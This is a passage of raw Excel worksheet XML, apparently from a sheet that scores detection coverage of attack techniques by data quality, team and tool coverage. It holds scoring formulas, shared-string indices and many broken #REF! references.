        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F123&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F123))-LEN(SUBSTITUTE(TRIM(F123),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O123" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P123" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F123&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F123))-LEN(SUBSTITUTE(TRIM(F123),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q123" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R123" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F123&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F123))-LEN(SUBSTITUTE(TRIM(F123),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S123" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T123" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F123&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F123))-LEN(SUBSTITUTE(TRIM(F123),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U123" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V123" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F123&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F123))-LEN(SUBSTITUTE(TRIM(F123),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W123" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X123" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F123&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F123))-LEN(SUBSTITUTE(TRIM(F123),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y123" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="124" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A124" s="8" t="s">
        <v>16</v>
      </c>
      <c r="B124" s="8" t="s">
        <v>7</v>
      </c>
      <c r="C124" s="8" t="s">
        <v>766</v>
      </c>
      <c r="D124" s="10" t="s">
        <v>767</v>
      </c>
      <c r="E124" s="10" t="s">
        <v>768</v>
      </c>
      <c r="F124" s="10" t="s">
        <v>705</v>
      </c>
      <c r="G124" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K124,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H124" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F124&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F124))-LEN(SUBSTITUTE(TRIM(F124),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I124" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F124&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F124))-LEN(SUBSTITUTE(TRIM(F124),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J124" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F124&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F124))-LEN(SUBSTITUTE(TRIM(F124),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K124" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L124" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F124&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F124))-LEN(SUBSTITUTE(TRIM(F124),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M124" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N124" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F124&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F124))-LEN(SUBSTITUTE(TRIM(F124),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O124" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P124" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F124&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F124))-LEN(SUBSTITUTE(TRIM(F124),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q124" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R124" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F124&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F124))-LEN(SUBSTITUTE(TRIM(F124),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S124" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T124" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F124&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F124))-LEN(SUBSTITUTE(TRIM(F124),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U124" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V124" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F124&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F124))-LEN(SUBSTITUTE(TRIM(F124),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W124" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X124" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F124&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F124))-LEN(SUBSTITUTE(TRIM(F124),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y124" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="125" spans="1:25" ht="142.5" x14ac:dyDescent="0.45">
      <c r="A125" s="8" t="s">
        <v>151</v>
      </c>
      <c r="B125" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C125" s="8" t="s">
        <v>769</v>
      </c>
      <c r="D125" s="10" t="s">
        <v>770</v>
      </c>
      <c r="E125" s="19" t="s">
        <v>771</v>
      </c>
      <c r="F125" s="10" t="s">
        <v>772</v>
      </c>
      <c r="G125" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K125,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H125" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F125&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F125))-LEN(SUBSTITUTE(TRIM(F125),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I125" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F125&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F125))-LEN(SUBSTITUTE(TRIM(F125),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J125" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F125&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F125))-LEN(SUBSTITUTE(TRIM(F125),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K125" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L125" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F125&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F125))-LEN(SUBSTITUTE(TRIM(F125),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M125" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N125" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F125&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F125))-LEN(SUBSTITUTE(TRIM(F125),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O125" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P125" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F125&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F125))-LEN(SUBSTITUTE(TRIM(F125),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q125" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R125" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F125&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F125))-LEN(SUBSTITUTE(TRIM(F125),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S125" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T125" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F125&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F125))-LEN(SUBSTITUTE(TRIM(F125),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U125" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V125" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F125&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F125))-LEN(SUBSTITUTE(TRIM(F125),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W125" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X125" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F125&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F125))-LEN(SUBSTITUTE(TRIM(F125),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y125" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="126" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A126" s="8" t="s">
        <v>110</v>
      </c>
      <c r="B126" s="8" t="s">
        <v>7</v>
      </c>
      <c r="C126" s="8" t="s">
        <v>773</v>
      </c>
      <c r="D126" s="10" t="s">
        <v>774</v>
      </c>
      <c r="E126" s="10" t="s">
        <v>775</v>
      </c>
      <c r="F126" s="10" t="s">
        <v>776</v>
      </c>
      <c r="G126" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K126,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H126" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F126&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F126))-LEN(SUBSTITUTE(TRIM(F126),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I126" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F126&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F126))-LEN(SUBSTITUTE(TRIM(F126),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J126" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F126&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F126))-LEN(SUBSTITUTE(TRIM(F126),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K126" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L126" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F126&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F126))-LEN(SUBSTITUTE(TRIM(F126),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M126" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N126" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F126&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F126))-LEN(SUBSTITUTE(TRIM(F126),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O126" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P126" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F126&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F126))-LEN(SUBSTITUTE(TRIM(F126),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q126" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R126" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F126&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F126))-LEN(SUBSTITUTE(TRIM(F126),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S126" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T126" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F126&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F126))-LEN(SUBSTITUTE(TRIM(F126),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U126" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V126" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F126&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F126))-LEN(SUBSTITUTE(TRIM(F126),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W126" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X126" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F126&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F126))-LEN(SUBSTITUTE(TRIM(F126),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y126" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="127" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A127" s="8" t="s">
        <v>201</v>
      </c>
      <c r="B127" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C127" s="8" t="s">
        <v>777</v>
      </c>
      <c r="D127" s="10" t="s">
        <v>778</v>
      </c>
      <c r="E127" s="10" t="s">
        <v>779</v>
      </c>
      <c r="F127" s="10" t="s">
        <v>596</v>
      </c>
      <c r="G127" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K127,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H127" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F127&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F127))-LEN(SUBSTITUTE(TRIM(F127),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I127" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F127&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F127))-LEN(SUBSTITUTE(TRIM(F127),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J127" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F127&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F127))-LEN(SUBSTITUTE(TRIM(F127),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K127" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L127" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F127&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F127))-LEN(SUBSTITUTE(TRIM(F127),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M127" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N127" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F127&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F127))-LEN(SUBSTITUTE(TRIM(F127),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O127" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P127" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F127&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F127))-LEN(SUBSTITUTE(TRIM(F127),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q127" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R127" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F127&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F127))-LEN(SUBSTITUTE(TRIM(F127),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S127" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T127" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F127&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F127))-LEN(SUBSTITUTE(TRIM(F127),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U127" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V127" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F127&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F127))-LEN(SUBSTITUTE(TRIM(F127),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W127" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X127" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F127&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F127))-LEN(SUBSTITUTE(TRIM(F127),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y127" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="128" spans="1:25" ht="409.5" x14ac:dyDescent="0.45">
      <c r="A128" s="8" t="s">
        <v>176</v>
      </c>
      <c r="B128" s="8" t="s">
        <v>541</v>
      </c>
      <c r="C128" s="8" t="s">
        <v>780</v>
      </c>
      <c r="D128" s="9" t="s">
        <v>781</v>
      </c>
      <c r="E128" s="19" t="s">
        <v>782</v>
      </c>
      <c r="F128" s="10" t="s">
        <v>761</v>
      </c>
      <c r="G128" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K128,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H128" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F128&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F128))-LEN(SUBSTITUTE(TRIM(F128),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I128" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F128&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F128))-LEN(SUBSTITUTE(TRIM(F128),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J128" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F128&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F128))-LEN(SUBSTITUTE(TRIM(F128),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K128" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L128" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F128&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F128))-LEN(SUBSTITUTE(TRIM(F128),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M128" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N128" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F128&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F128))-LEN(SUBSTITUTE(TRIM(F128),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O128" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P128" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F128&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F128))-LEN(SUBSTITUTE(TRIM(F128),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q128" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R128" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F128&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F128))-LEN(SUBSTITUTE(TRIM(F128),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S128" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T128" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F128&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F128))-LEN(SUBSTITUTE(TRIM(F128),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U128" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V128" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F128&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F128))-LEN(SUBSTITUTE(TRIM(F128),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W128" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X128" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F128&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F128))-LEN(SUBSTITUTE(TRIM(F128),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y128" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="129" spans="1:25" ht="142.5" x14ac:dyDescent="0.45">
      <c r="A129" s="8" t="s">
        <v>186</v>
      </c>
      <c r="B129" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C129" s="25" t="s">
        <v>783</v>
      </c>
      <c r="D129" s="10" t="s">
        <v>784</v>
      </c>
      <c r="E129" s="19" t="s">
        <v>785</v>
      </c>
      <c r="F129" s="10" t="s">
        <v>786</v>
      </c>
      <c r="G129" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K129,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H129" s="51">
